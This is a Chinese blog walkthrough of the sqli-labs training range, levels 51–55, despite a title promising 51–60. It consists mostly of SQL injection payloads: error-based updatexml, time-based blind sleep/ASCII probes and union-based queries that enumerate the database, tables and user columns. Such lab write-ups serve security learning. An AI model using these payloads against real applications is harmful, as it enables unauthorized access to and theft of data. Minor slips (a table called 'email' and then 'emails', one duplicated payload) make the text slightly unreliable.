sqli-labs靶场通关攻略（51-60）

L黎蕊

已于 2024-09-01 14:22:14 修改

阅读量434

点赞数 5

文章标签： mysql

于 2024-08-30 11:52:25 首次发布

本文链接：https://blog.csdn.net/2301_80402555/article/details/141712976

版权

Less-51

1、判断闭合方式

输入?sort=1' --+ 页面闭合成功
2、查询数据库

输入?sort=-1' and updatexml(1,concat(1,database()),1) --+

3、查询数据库中的表

输入?sort=-1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) --+

4、查询users表中的列

输入?sort=-1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

Less-52

1、判断闭合方式

输入?sort=1 --+ ,页面闭合成功

2、查询数据库长度

输入?sort=1 and if(length(database())>7,sleep(3),1) --+ 页面延时三秒

输入?sort=1 and if(length(database())>8,sleep(3),1) --+ 页面回显正常

得出数据库长度为8

3、查询数据库名

输入?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)，页面延时三秒

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1) 页面回显正常

得出第一位字符的ASCII值为115，结合ASCII表得出的一个字符为‘s’

再依次类推得出数据库名为‘security’

4、查询数据库中的表

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1) 页面延时三秒

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1) 页面回显正常

得出表的第一个字符的ascii值为101，结合ASCII表得出第一个字符为‘e’

再依次类推，得出第一个数据库为‘email’

Less-53

1、判断闭合方式

输入?sort=1' --+ 页面闭合成功

2、查询数据库名

输入?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

页面延时三秒

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

页面正常回显

说明第一个字符大于114不大于115 即第一位字符ascii码等于115

结合ASCII表得出的一个字符为‘s’

再依次类推，得出数据库名为‘security’

3、查询数据库中的表

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延时三秒

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常回显

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

Less-54

1、查询数据库名

?id=-1'union select 1,2,database()--+

2、查询数据库中的表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

3、查询users表中所有列

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

Less -55

1、查询数据库名

?id=-1)union select 1,2,database()--+

2、查询数据库中所有表

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

3、查询users表中所有列

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

L黎蕊

关注

5
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs靶场通关攻略（51-60）

sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1) 页面回显正常。sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)，页面延时三秒。3、查询数据库中的表。4、查询数据库中的表。
复制链接

扫一扫